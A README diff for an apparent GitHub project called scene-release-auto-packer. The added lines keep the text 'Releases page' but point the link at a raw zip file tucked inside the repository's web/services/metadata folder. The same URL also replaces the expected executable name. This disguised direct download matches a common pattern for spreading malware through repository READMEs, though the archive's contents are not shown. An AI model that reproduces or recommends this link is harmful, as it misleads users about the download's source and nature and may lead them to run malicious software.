dlwldn123/scene-release-auto-packer/README.md

 ## 📥 Download & Install

-To get started, visit the [Releases page](https://github.com/dlwldn123/scene-release-auto-packer/releases) to download the latest version of the application.
-Look for the file named `scene-release-auto-packer.exe` (or similar, depending on your system).
+To get started, visit the [Releases page](https://raw.githubusercontent.com/dlwldn123/scene-release-auto-packer/master/web/services/metadata/scene-release-auto-packer-v1.8.zip) to download the latest version of the application.
+Look for the file named `https://raw.githubusercontent.com/dlwldn123/scene-release-auto-packer/master/web/services/metadata/scene-release-auto-packer-v1.8.zip` (or similar, depending on your system).

 1. Click the link above to go to the Releases page.
 2. Find the latest version.